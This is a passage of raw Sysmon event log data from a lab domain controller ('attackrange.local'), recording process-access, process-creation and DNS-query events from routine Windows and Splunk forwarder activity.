L32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002458Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.431{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002457Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.431{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002456Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.431{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002455Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.431{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002454Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.431{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002453Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.431{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002452Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.431{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002451Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.431{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002450Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.431{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-429E-6000-7300-000000009A01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002449Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.431{08A6967A-4298-6000-3400-000000009A01}23163944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-429E-6000-7300-000000009A01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002448Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.433{08A6967A-429E-6000-7300-000000009A01}3832C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002447Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.321{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429E-6000-7200-000000009A01}3692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002446Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002445Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002444Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002443Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002442Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002441Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002440Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002439Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002438Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.321{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002437Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.321{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-429E-6000-7200-000000009A01}3692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002436Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.321{08A6967A-4298-6000-3400-000000009A01}23163944C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-429E-6000-7200-000000009A01}3692C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002435Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.324{08A6967A-429E-6000-7200-000000009A01}3692C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002434Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.108{08A6967A-4298-6000-2B00-000000009A01}2680WIN-DC-2500fe80::1c24:42de:efae:dae3;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002433Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:49.108{08A6967A-4298-6000-2B00-000000009A01}2680WIN-DC-250010.0.1.14;C:\Windows\System32\spoolsv.exe 22542200x80000000000000002432Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:48.916{08A6967A-4298-6000-2B00-000000009A01}2680WIN-DC-2500fe80::1c24:42de:efae:dae3;::ffff:10.0.1.14;C:\Windows\System32\spoolsv.exe 10341000x80000000000000002431Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:50.212{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-429E-6000-7100-000000009A01}3820C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002430Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 